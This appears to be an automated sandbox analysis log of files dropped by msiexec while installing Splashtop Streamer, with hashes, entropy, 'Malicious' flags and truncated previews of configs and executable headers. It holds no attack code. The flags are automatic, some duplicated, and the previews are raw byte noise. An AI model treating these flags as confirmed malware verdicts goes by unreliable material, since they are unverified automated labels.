                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\String1033.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isE656.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*.!.D.!.D.!.D../..D.D../..(.D../....D.... .D.!.E.[.D......D.....%.D..... .D.!.. .D..... .D.Rich!.D.........................PE..d...d.a.........."......X...v.................@....................................s{....`..................................................J..........`.......$.......0$..........`t..8...............................p............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data... B...`.......D..............@....pdata..$............`..............@..@.rsrc...`............v..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isres_0x0409.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..(...{...{...{...{...{,..{J..{...{P..{..{...{,..{...{..{...{Rich...{........PE..L...4..a...........!.........................................................p......Q<.......................................@..(....P..9...........pP..8$...@.......................................................A...............................text...@........................... ..`.rdata........... ..................@..@.data....f.......P..................@....idata.......@....... ..............@....rsrc...9....P.......0..............@..@.reloc...)...@...0... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\setup.inx

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:t.,....(... <$.M. .=..........l.............o.c...gWSl..SW..WS[//d.d l$.XX%.......................q.y}aD%mQ.Y]A..M1...!.)........................................}...m..q]}}aMm.U=].E-M.5.=.%.-.......................e.......G.....v.@....qeymee1m.......c.)!!.)g..?.....K.7.+.OH..... .D@..0....e..dXH......P..(..]UU-]......kS.kk.....C.WO7'.[.<X44....,..$.8... ...}..\......@.5km!U.gL.8..g....-....._..k#+G##.LP8.H.@......0...T.......Y..D.........1II.1.o.s..Cg..G.....O.Og.CL<L.P.......p.d$........Y..L......<.. ...III.1..k_.....o.oGO?.....H.,@.X.P. ......p..,...\......m..<.....]YMEE.M..w[..[..{os.....O.C_G.t$l.D8\..........,.......}..]..`.........)5M.5.o.W_...sO3.SGk....h$.`,...4.L.$.<..........@...d...e}}1e.D.....o...S)!!.)g.GsK?..0.....#.h$P(.\\...........x(..am.I...p....H.......=9.!S3.wgksK.......3[C ......(.......,...........q.ayyaa.YQQYYc9E%11%9._.......W{7;wSo.......`(h<......L.4..........ay.q...a}Qii]Q....5MM!5.wSl.-.....w'.+k3/..+d.....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{82794CC3-3F11-42A7-B032-B323712514EA}\Description.xml

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2374
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.66619220204628
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3j9wrwgwzfy2wzcibOi2wzitw+53WgnJWwC5LDwhFTtw7NC0:2cRzfyLz9bOiLzl+53WgndphFu7Nv
                                                                                                                                                                                                                                                                                                                                  MD5:BD29ACF2C6B763E5398C71D360958C60
                                                                                                                                                                                                                                                                                                                                  SHA1:86FD0E905AF254E6209EC6F1888E7EBAE248D977
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B90C8121D1D91FF3CF07A56F5E5FBC12DCCF9B09AE90984E171CFBF1F9E69CE
                                                                                                                                                                                                                                                                                                                                  SHA-512:1042B3344BBB482CC8C31936D5368B9B81F5BDC5335F81BCE49367F09514C13D427A05E04137EBFE0F18C7F99D8CAF6E4742DC3A6881D88004251A49DA896EFA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<Description Default="en">..<en Default="US">..<US>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. A computer with the Splashtop Remote Desktop Server can receive connections from any device running Splashtop Remote Client...</US>..</en>..<de Default="DE">..<DE>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Ein Computer mit dem Splashtop Remote Desktop Server kann Verbindungen von jedem Ger.t empfangen, auf dem der Splashtop Remote Client l.uft...</DE>..</de>..<es Default="ES">..<ES>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Un equipo con Splashtop Remote Desktop Server puede recibir conexiones desde cualquier dispositivo que est. ejecutando Splashtop Remote Client...</ES>..</es>..<fr Default="FR">..<FR>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Un ordinateur avec Splashtop Remote Desktop Server peut recevoir des co

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{82794CC3-3F11-42A7-B032-B323712514EA}\setup.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1493
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.601665610962739
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Zem6aTKNVASoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNhD:gPoh0dBeNbMoqvEV0Y0+bjjXD7FwNUQ
                                                                                                                                                                                                                                                                                                                                  MD5:5A9302AEA54E2C4341F2254E8E914271
                                                                                                                                                                                                                                                                                                                                  SHA1:DBD0D914EBAEF52B16E17092CC7DCCC31517797F
                                                                                                                                                                                                                                                                                                                                  SHA-256:F68C1CDA9475717430B6A3F0656085F8FB72CD3CAA66D048DE84F17CA7BE582E
                                                                                                                                                                                                                                                                                                                                  SHA-512:11552F3B66510AE76F715DB99F2A75A9D891DFA490E417C1230BBDFEDF348717FB143E773ABFA42BC3A109CCE6B3C1EBDE7ADA5E2103DB17D2B194398F6EE272
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..EnableNvFBC=0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Business..[COMPATIBLE_1]..PRODUCTID={73A1

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\ISRT.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........A.YA.YA.Yf.mYG.Y..nY].Y..XC.Y..mY@.Y..mY..Y..lY..Y...Y@.Y...YE.YA.Y..Y...YV.Y..lY..Y..iY@.Y..jY@.YA.4Y@.Y..oY@.YRichA.Y................PE..L.....a...........!.....|...@...............................................@......................................p...................h...............($...0.........8...................................................DU..@....................text............P......PEC2MO...... ....rsrc....@.......4...T.............. ....reloc.......0......................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\IsConfig.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\String1033.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_is9FE6.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*.!.D.!.D.!.D../..D.D../..(.D../....D.... .D.!.E.[.D......D.....%.D..... .D.!.. .D..... .D.Rich!.D.........................PE..d...d.a.........."......X...v.................@....................................s{....`..................................................J..........`.......$.......0$..........`t..8...............................p............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data... B...`.......D..............@....pdata..$............`..............@..@.rsrc...`............v..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_isres_0x0409.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..(...{...{...{...{...{,..{J..{...{P..{..{...{,..{...{..{...{Rich...{........PE..L...4..a...........!.........................................................p......Q<.......................................@..(....P..9...........pP..8$...@.......................................................A...............................text...@........................... ..`.rdata........... ..................@..@.data....f.......P..................@....idata.......@....... ..............@....rsrc...9....P.......0..............@..@.reloc...)...@...0... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\setup.inx

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
